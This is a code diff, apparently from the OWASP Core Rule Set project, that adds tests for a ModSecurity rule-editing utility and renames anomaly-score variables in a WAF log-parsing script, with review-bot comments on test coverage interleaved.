\\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_retains_correct_line_numbers(self): + arguments = [ + "--remove-tfunc", "lowercase" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,t:lowercase,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_variables_test.py b/util/rule_ctl/tests/rule_ctl_variables_test.py new file mode 100644 index 0000000000..48923aaf59 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_variables_test.py 
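Review bot: No case pins whether `--remove-tfunc lower` leaves `t:lowercase` untouched: `test_remove_tfunc_retains_correct_line_numbers` removes `lowercase` from `t:none,t:lowercase`, and the other removal tests remove `lower` from fixtures that contain only `t:lower` and `t:decodeUrl`, so a prefix or substring match in the implementation would pass every test here while dropping the wrong transformation from a real rule. One fixture holding both `t:lower` and `t:lowercase` with `"--remove-tfunc", "lower"`, expecting only `t:lower` to go, would close that. Also, most fixtures use `t:decodeUrl`, which is not a ModSecurity transformation name, while `test_append_tfunc_with_duplicate_transformation` uses the real `t:urlDecode`; the tool is text-based so correctness is unaffected, but `urlDecode` throughout would avoid misleading readers.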
@@ -0,0 +1,327 @@ +from .helpers import * + +class TestAppendVariable: + def test_append_variable_with_one_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_existing_variables(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_duplicate_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_multiple_args(self): + arguments = [ + "--append-variable", "XML", + "--append-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML|DURATION "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_with_chain(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_skip_chain(self): + arguments = [ + "--append-variable", "XML", + 
"--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveVariable: + def test_remove_variable_with_no_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_existing_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_multiple_args(self): + arguments = [ + "--remove-variable", "XML", + "--remove-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_with_chain(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_skip_chain(self): + arguments = [ + "--remove-variable", "XML", + 
"--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceVariable: + def test_replace_variable_name_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_multiple_args(self): + arguments = [ + "--replace-variable", "XML,ARGS:xml", + "--replace-variable", "DURATION,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + 
assert expected == get_output(context) + + + def test_replace_variable_name_skip_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,!DURATION:half-life", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|!DURATION:half-life|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_multiple_args(self): + arguments = [ + "--replace-variable", "&XML,ARGS:xml", + "--replace-variable", "!DURATION:half-life,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|&XML|ARGS:foo|!DURATION:half-life|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + 
expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_skip_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/send-payload-pls.sh b/util/send-payload-pls.sh index b769a930dd..168736a0b8 100755 --- a/util/send-payload-pls.sh +++ b/util/send-payload-pls.sh @@ -24,14 +24,14 @@ # # The anomaly score envvar can be set as follows: # SecAction "id:90101,phase:5,pass,nolog,\ -# setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score}" +# setenv:ModSecAnomalyScoreIn=%{TX.blocking_inbound_anomaly_score}" # # Sample rule to setup the PL dynamically from localhost" # SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \ # "id:90102,phase:1,pass,capture,log,auditlog,\ # msg:'Setting engine to PL%{matched_var}',chain" # SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \ -# "setvar:'tx.executing_paranoia_level=%{matched_var}'" +# "setvar:'tx.detection_paranoia_level=%{matched_var}'" # Path to CRS rule set and local files CRS="/usr/share/modsecurity-crs/rules" @@ -75,6 +75,7 @@ do echo "Usage:" echo " --access \"/apache/logs/access.log\"" echo " --error \"/apache/logs/error.log\"" + echo " --crs \"/usr/share/modsecurity-crs/rules\"" echo " --url \"localhost:40080\"" echo " --resolve \"someservername:40080:localhost\"" echo " --protocol \"https\"" 
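Review bot: `test_replace_variable_with_no_variable` is a byte-for-byte duplicate of `test_replace_variable_name_with_no_variable` (same arguments `XML,DURATION`, same rule string, `expected = rule_string`), so one of them should go. More importantly, the `TestReplaceVariable` fixtures show variables with prefixes and selectors (`&XML`, `!XML:'lisa'`, `!DURATION:half-life`), yet `--remove-variable XML` and `--replace-variable XML,DURATION` are only ever run against a bare `XML`; no case pins whether `XML` also matches `&XML`, `!XML` or `XML:foo`, which decides whether removing a variable can silently drop a negated exclusion or a count check from a rule. A constructed fixture such as `SecRule ARGS|&XML|XML:foo "@rx foo" "id:12"` with `"--remove-variable", "XML"` and an explicit expected line would settle it either way.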
@@ -143,20 +144,20 @@ for PL in 1 2 3 4; do
 # The automatic format detection may cause the script to malfunction.
 # Uncomment only the required format.
 # To use Christian's accesslog format uncomment the following line
- uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26)
+ #uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26)
 # To use Spartan's accesslog format (21 col) uncomment the following line
 #uniq_id=$(tail -1 $accesslog | awk '{print $21}')
 # To use the automatic unique_id detection uncomment the following line
- #uniq_id=$(tail -1 $accesslog | egrep -o '[a-zA-Z0-9]{26,28}')
+ uniq_id=$(tail -1 $accesslog | egrep -o '\b[a-zA-Z0-9_-]{26,28}\b')
 echo "Tracking unique id: $uniq_id"
- grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/"
+ grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Inbound and Outbound Score: [0-9]* [0-9]*/Inbound and Outbound Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/"
 echo
- echo -n "Total Incoming Score: "
+ echo -n "Total Inbound Score: "
 # Here are two ways to get the transaction anomaly score,
 # the first one is Christian's format, second is Spartan's format